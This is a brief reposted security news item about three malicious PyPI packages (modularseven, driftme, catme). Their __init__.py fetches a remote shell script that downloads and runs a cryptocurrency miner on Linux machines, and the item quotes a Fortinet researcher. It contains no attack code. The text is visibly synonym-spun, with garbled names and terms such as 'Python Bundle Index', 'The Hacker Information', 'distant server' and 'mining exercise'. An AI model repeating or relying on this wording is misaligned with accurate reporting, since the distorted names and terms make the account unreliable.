An nameless reader shared this report from The Hacker Information:
Three new malicious packages have been found within the Python Bundle Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux units.
The three dangerous packages, named modularseven, driftme, and catme, attracted a complete of 431 downloads over the previous month earlier than they have been taken down…
The malicious code resides within the __init__.py file, which decodes and retrieves the primary stage from a distant server, a shell script (“unmi.sh”) that fetches a configuration file for the mining exercise in addition to the CoinMiner file hosted on GitLab. The ELF binary file is then executed within the background utilizing the nohup command, thus guaranteeing that the method continues to run even after exiting the session. “Echoing the strategy of the sooner ‘culturestreak’ bundle, these packages conceal their payload, successfully lowering the detectability of their malicious code by internet hosting it on a distant URL,” mentioned Fortinet FortiGuard Labs researcher Gabby Xiong. “The payload is then incrementally launched in numerous levels to execute its malicious actions.”